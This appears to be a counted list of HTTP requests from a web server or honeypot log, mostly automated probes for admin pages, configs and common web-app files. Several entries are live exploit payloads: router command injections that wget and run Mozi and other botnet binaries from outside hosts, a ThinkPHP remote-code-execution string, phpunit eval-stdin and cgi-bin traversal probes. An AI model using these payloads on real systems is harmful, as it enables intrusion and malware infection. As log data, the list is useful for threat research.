1	GET	`/TP/index.php`	HTTP/1.1
1	GET	`/TP/public/index.php`	HTTP/1.1
2	GET	`/Template/Mobile/js/main.js`	HTTP/1.1
1	GET	`/Templates/user/finance/css/userPay.css`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/admin/`	HTTP/1.1
1	GET	`/admin/config.php`	HTTP/1.1
1	GET	`/admin/index`	HTTP/1.1
1	GET	`/admin/webadmin.php?mod=do&act=login`	HTTP/1.1
1	GET	`/admin`	HTTP/1.1
2	GET	`/ajax/allcoin_a/id/0?t=0.3782499195965951`	HTTP/1.1
1	GET	`/ajax?act=getrlist&rid=1`	HTTP/1.1
1	GET	`/anquan/qgga.asp`	HTTP/1.1
2	GET	`/api/ApiHub/fetchJinse`	HTTP/1.1
1	GET	`/api/apps/config`	HTTP/1.1
2	GET	`/api/apps`	HTTP/1.1
1	GET	`/api/common/getConfig`	HTTP/1.1
2	GET	`/api/config-init`	HTTP/1.1
2	GET	`/api/config/info`	HTTP/1.1
1	GET	`/api/contactWay`	HTTP/1.1
1	GET	`/api/content_bottom`	HTTP/1.1
2	GET	`/api/customerServiceLink`	HTTP/1.1
1	GET	`/api/default/login-page`	HTTP/1.1
1	GET	`/api/getconfig.aspx`	HTTP/1.1
2	GET	`/api/home/index`	HTTP/1.1
2	GET	`/api/index/grailindex`	HTTP/1.1
1	GET	`/api/index/index`	HTTP/1.1
1	GET	`/api/index/loansList`	HTTP/1.1
1	GET	`/api/index/webconfig`	HTTP/1.1
2	GET	`/api/linkPF`	HTTP/1.1
1	GET	`/api/lottery/color`	HTTP/1.1
1	GET	`/api/message/webInfo`	HTTP/1.1
2	GET	`/api/pc/cms-config`	HTTP/1.1
2	GET	`/api/pc/configure`	HTTP/1.1
1	GET	`/api/product/info/1`	HTTP/1.1
1	GET	`/api/public/?service=Home.getConfig`	HTTP/1.1
1	GET	`/api/site/getInfo.do`	HTTP/1.1
2	GET	`/api/stock/getSingleStock.do?code=002405`	HTTP/1.1
2	GET	`/api/uploads/apimap`	HTTP/1.1
1	GET	`/api/user/dataDictionaryService/list`	HTTP/1.1
2	GET	`/api/user/get_user_group`	HTTP/1.1
1	GET	`/api/user/ismustmobile`	HTTP/1.1
2	GET	`/api/v/index/queryOfficePage?officeCode=customHomeLink`	HTTP/1.1
2	GET	`/api/v1/about`	HTTP/1.1
1	GET	`/api/v1/member/kefu`	HTTP/1.1
1	GET	`/api/wallet/redDetail`	HTTP/1.1
1	GET	`/api/web/user/getIndexData.php`	HTTP/1.1
1	GET	`/apis/api/index`	HTTP/1.1
1	GET	`/app/js/base.js`	HTTP/1.1
1	GET	`/appxz/index.html`	HTTP/1.1
1	GET	`/assets/app-manifest.json`	HTTP/1.1
1	GET	`/assets/dist/static/js/vendor_prod.js`	HTTP/1.1
1	GET	`/assets/extension/market/css/mt4.css`	HTTP/1.1
1	GET	`/assets/images/bg.jpg`	HTTP/1.1
1	GET	`/assets/js/dmshub.js`	HTTP/1.1
1	GET	`/assets/room/css/room_mobile.css`	HTTP/1.1
2	GET	`/banner.do?code=1`	HTTP/1.1
1	GET	`/base/exchange_article/index/classid/1/id/1`	HTTP/1.1
1	GET	`/blog/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/client/api/findConfigByKey?configKey=level_config`	HTTP/1.1
1	GET	`/client/api/findFreeTrade`	HTTP/1.1
1	GET	`/cms/wp-includes/wlwmanifest.xml`	HTTP/1.1
2	GET	`/common/template/lottery/lecai/css/style.css`	HTTP/1.1
1	GET	`/config.js`	HTTP/1.1
2	GET	`/config.php?_=3283&1922563758`	HTTP/1.1
2	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/cscpLoginWeb/scripts/public.js`	HTTP/1.1
1	GET	`/csjs/bankCheck.js`	HTTP/1.1
1	GET	`/css/app.css`	HTTP/1.1
2	GET	`/css/dafa.css`	HTTP/1.1
1	GET	`/css/main.css`	HTTP/1.1
1	GET	`/css/nsc/reset.css`	HTTP/1.1
2	GET	`/css/skin/ymPrompt.css`	HTTP/1.1
1	GET	`/css/style.css`	HTTP/1.1
1	GET	`/data/ticker_24hr`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
2	GET	`/douyinpay.php?order=20210815173223834`	HTTP/1.1
1	GET	`/elrekt.php`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/fePublicInfo/`	HTTP/1.1
1	GET	`/files/pub_rem.js`	HTTP/1.1
2	GET	`/files/pub_reset.css`	HTTP/1.1
2	GET	`/friendGroup/list`	HTTP/1.1
1	GET	`/gaga/city.php`	HTTP/1.1
1	GET	`/getConfig/getArticle.do?code=19`	HTTP/1.1
1	GET	`/getConfig/getArticle.do?code=1`	HTTP/1.1
1	GET	`/getConfig/listPopFrame.do?code=1&position=index&_=1601489645097`	HTTP/1.1
2	GET	`/getConfig/listPopFrame.do?code=14&position=index&_=1601489645097`	HTTP/1.1
1	GET	`/getLocale`	HTTP/1.1
2	GET	`/h5/`	HTTP/1.1
1	GET	`/h5/static/tabbar/txl.png`	HTTP/1.1
2	GET	`/h5`	HTTP/1.1
1	GET	`/home/GetQrCodeInfo`	HTTP/1.1
1	GET	`/home/help`	HTTP/1.1
2	GET	`/home/login.jpg`	HTTP/1.1
1	GET	`/home/login/login_index.html`	HTTP/1.1
1	GET	`/home/main/login`	HTTP/1.1
3	GET	`/homes/`	HTTP/1.1
2	GET	`/html/public/index.php`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/im/App/config`	HTTP/1.1
1	GET	`/im/`	HTTP/1.1
2	GET	`/im/h5/`	HTTP/1.1
1	GET	`/im/in/GetUuid`	HTTP/1.1
1	GET	`/images/favicon.ico`	HTTP/1.1
1	GET	`/images/no.jpg`	HTTP/1.1
1	GET	`/images/src_images_but_dianz_s.png`	HTTP/1.1
2	GET	`/img/login.png`	HTTP/1.1
1	GET	`/img/xxing.png`	HTTP/1.1
2	GET	`/img/zllqdk.png`	HTTP/1.1
1	GET	`/index.php/Wap/Api/getBanner`	HTTP/1.1
1	GET	`/index.php/Wap/Api/getSystemNotice?id=1`	HTTP/1.1
1	GET	`/index.php/sign`	HTTP/1.1
2	GET	`/index.php?m=api&c=app&a=getPlatformConfig`	HTTP/1.1
1	GET	`/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1`	HTTP/1.1
1	GET	`/index.php`	HTTP/1.1
1	GET	`/index/api/config`	HTTP/1.1
1	GET	`/index/getNews`	HTTP/1.1
1	GET	`/index/index/andiro`	HTTP/1.1
1	GET	`/index/index/js/api.js`	HTTP/1.1
1	GET	`/index/index/purchase.html`	HTTP/1.1
2	GET	`/index/login/login`	HTTP/1.1
2	GET	`/index/login/register`	HTTP/1.1
1	GET	`/index/newapi/api`	HTTP/1.1
1	GET	`/index/police/index.html?agent=1000`	HTTP/1.1
1	GET	`/index_files/bankCheck.js`	HTTP/1.1
1	GET	`/infe/rest/fig/advertise/common.json?mobile_open=1`	HTTP/1.1
1	GET	`/infe/rest/flash/getServerIP.json`	HTTP/1.1
1	GET	`/ipl/app/flash/publicbmw/ball/FigLeaf.js?site=member`	HTTP/1.1
2	GET	`/java_script/template_1/game.js?v=1`	HTTP/1.1
2	GET	`/js/a.script`	HTTP/1.1
1	GET	`/js/bankCheck.js`	HTTP/1.1
1	GET	`/js/base1.js`	HTTP/1.1
1	GET	`/js/basic.js`	HTTP/1.1
1	GET	`/js/common.js`	HTTP/1.1
2	GET	`/js/dianzan.js`	HTTP/1.1
1	GET	`/js/home.js`	HTTP/1.1
2	GET	`/js/json.js`	HTTP/1.1
2	GET	`/js/post.js/`	HTTP/1.1
2	GET	`/js/pups.js`	HTTP/1.1
1	GET	`/js/tvConfig.js`	HTTP/1.1
1	GET	`/kefu.php`	HTTP/1.1
1	GET	`/kkrps/im_group/show_members`	HTTP/1.1
2	GET	`/lanren/css/global.css`	HTTP/1.1
1	GET	`/legal/currency/set`	HTTP/1.1
1	GET	`/loan`	HTTP/1.1
1	GET	`/login.html`	HTTP/1.1
1	GET	`/login/img/nyyh/chkjs.js`	HTTP/1.1
1	GET	`/m/`	HTTP/1.1
1	GET	`/m/allticker/1`	HTTP/1.1
2	GET	`/m/ticker/usdtqc`	HTTP/1.1
2	GET	`/manager/js/left.js`	HTTP/1.1
1	GET	`/market/getStockBaseInfo?stockCodeInternal=2658`	HTTP/1.1
1	GET	`/mh/phone.do`	HTTP/1.1
1	GET	`/mobile/bluev3/img/bg.png`	HTTP/1.1
1	GET	`/mobile/config.js`	HTTP/1.1
2	GET	`/mobile/css/base.css`	HTTP/1.1
2	GET	`/mobile/static/js/config.js`	HTTP/1.1
1	GET	`/mobile/v3/appSuperDownload.do`	HTTP/1.1
2	GET	`/mtja.html`	HTTP/1.1
1	GET	`/myConfig.js`	HTTP/1.1
1	GET	`/mytio/config/base`	HTTP/1.1
1	GET	`/news/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/nyyh/game.css`	HTTP/1.1
1	GET	`/otc/`	HTTP/1.1
1	GET	`/other/codepay/js/codepay_util.js`	HTTP/1.1
2	GET	`/pages/console/js/common.js`	HTTP/1.1
1	GET	`/portal/index/protocol.html`	HTTP/1.1
1	GET	`/proxy/games`	HTTP/1.1
2	GET	`/proxy/settings`	HTTP/1.1
1	GET	`/public/admin.php/api/index/loansList`	HTTP/1.1
1	GET	`/public/css/style.css`	HTTP/1.1
2	GET	`/public/img/cz1.png`	HTTP/1.1
1	GET	`/public/index.php`	HTTP/1.1
1	GET	`/public/static/css/denglu.css`	HTTP/1.1
2	GET	`/public/static/css/public.css`	HTTP/1.1
1	GET	`/public/static/home/js/moblie/login.js`	HTTP/1.1
1	GET	`/public/wap/js/basis.js`	HTTP/1.1
1	GET	`/public/web/css/add//index[.]css`	HTTP/1.1
1	GET	`/public/web/js/add/com.js`	HTTP/1.1
1	GET	`/resources/main/common.js`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/room/getRoomBangFans`	HTTP/1.1
1	GET	`/room/script/face.js`	HTTP/1.1
2	GET	`/s_api/basic/config_js?callback=__set_config`	HTTP/1.1
1	GET	`/s_api/basic/download/info`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//60[.]183[.]151[.]200:38594/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.46/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep[.]jaws`
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
2	GET	`/site.js`	HTTP/1.1
1	GET	`/site/get-hq?proNo=btc&panType=1&pid=1`	HTTP/1.1
1	GET	`/site/info`	HTTP/1.1
1	GET	`/site/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/sito/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/skin/js/common.js`	HTTP/1.1
1	GET	`/skin/main/onload.js`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/static/admincp/js/common.js`	HTTP/1.1
1	GET	`/static/common/js/common.js`	HTTP/1.1
1	GET	`/static/config.js`	HTTP/1.1
1	GET	`/static/css/index.css`	HTTP/1.1
1	GET	`/static/css/mobile.css`	HTTP/1.1
2	GET	`/static/css/public.css`	HTTP/1.1
1	GET	`/static/data/configjs.js`	HTTP/1.1
1	GET	`/static/data/gamedatas.js`	HTTP/1.1
2	GET	`/static/diff_worker.js`	HTTP/1.1
2	GET	`/static/download/style.css`	HTTP/1.1
2	GET	`/static/h5/img/icon__create-group.png`	HTTP/1.1
1	GET	`/static/home/css/common.css`	HTTP/1.1
1	GET	`/static/home/css/new_cfb.css`	HTTP/1.1
1	GET	`/static/home/js/rooms.js`	HTTP/1.1
1	GET	`/static/icon/my.png`	HTTP/1.1
1	GET	`/static/image/chicang.png`	HTTP/1.1
1	GET	`/static/images/login_bg.jpg`	HTTP/1.1
1	GET	`/static/img/bitbeb-logo.png`	HTTP/1.1
1	GET	`/static/img/notices.png`	HTTP/1.1
1	GET	`/static/index/css/iindex.css`	HTTP/1.1
2	GET	`/static/index/css/trade-history.css`	HTTP/1.1
2	GET	`/static/js/user.js`	HTTP/1.1
2	GET	`/static/local/img/userCenter/hourlyPrivilege.svg`	HTTP/1.1
1	GET	`/static/wap/css/index.css`	HTTP/1.1
1	GET	`/static/wap/css/trade-history.css`	HTTP/1.1
1	GET	`/static/wap/js/common.js`	HTTP/1.1
1	GET	`/static/wap/js/order.js`	HTTP/1.1
1	GET	`/statics/js/API.js`	HTTP/1.1
2	GET	`/stock/mzhishu`	HTTP/1.1
1	GET	`/stock/search.html?keyword=00202`	HTTP/1.1
1	GET	`/sys/setting/app`	HTTP/1.1
1	GET	`/template/920ka/css/lsy.css`	HTTP/1.1
1	GET	`/template/920ka/js/woodyapp.js`	HTTP/1.1
2	GET	`/template/css/login.css`	HTTP/1.1
2	GET	`/template/tmp1/js/common.js`	HTTP/1.1
1	GET	`/test/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/themes/simpleboot3/public/assets/newpc/download_pattern_right.png`	HTTP/1.1
1	GET	`/thinkphp/html/public/index.php`	HTTP/1.1
1	GET	`/thriveGame.css`	HTTP/1.1
1	GET	`/user/Login`	HTTP/1.1
2	GET	`/user/login.html`	HTTP/1.1
1	GET	`/user/userlist`	HTTP/1.1
1	GET	`/v1/management/tenant/getSpeedDomain`	HTTP/1.1
1	GET	`/v2/block/home/app/hot`	HTTP/1.1
2	GET	`/v2/start/config`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/verification.asp`	HTTP/1.1
2	GET	`/views/commData/commonSite.js`	HTTP/1.1
1	GET	`/views/home/home.js`	HTTP/1.1
2	GET	`/wap/trading/get_newallorder_ajax`	HTTP/1.1
1	GET	`/wap`	HTTP/1.1
1	GET	`/web/api/getBanner`	HTTP/1.1
1	GET	`/web/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/website/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wordpress/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp1/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp2/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/ws/index/getTheLotteryInitList`	HTTP/1.1
1	GET	`/xmlrpc.php?rsd`	HTTP/1.1
1	GET	`/xy/`	HTTP/1.1
1	GET	`/xy/image/jiantou.png`	HTTP/1.1
1	GET	`/zz/address.php?gid=651`	HTTP/1.1
12	GET	`http[:]//azenv[.]net/`	HTTP/1.1
1	GET	`http[:]//www[.]bing[.]com/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/api/app/config_new`	HTTP/1.1
2	POST	`/api/link/platform`	HTTP/1.1
1	POST	`/api/system/system/config/get`	HTTP/1.1
1	POST	`/api/user/mobilelogin`	HTTP/1.1
2	POST	`/api/v1/borrowxx.html`	HTTP/1.1
1	POST	`/biz/server/config`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
2	POST	`/index.php/api/other/appSetting`	HTTP/1.1
1	POST	`/index.php?s=captcha`	HTTP/1.1
1	POST	`/index/indexSymbol`	HTTP/1.1
2	POST	`/kkrp/site/info`	HTTP/1.1
1	POST	`/login/kefuxian.mvc`	HTTP/1.1
1	POST	`/melody/api/v1/pageconfig/list`	HTTP/1.1
1	POST	`/sys/setting/all`	HTTP/1.1
1	POST	`/v1/auth/getCaptcha`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	POST	`/wap/banner/details`	HTTP/1.1
1	POST	`http[:]//maryblack[.]xyz/77f991dfdcc4e79f5b8da14c9bd1e283feddc6243e8a1281754da7303509ca462c614d9b72cfee1e4357f902e822f07894ae3365da692fc75356e8ffe58413411acc7e273055ba0362dca3966ee9099f3f71189cb7e3a43b8aeed5d3888ba7ef`	HTTP/1.1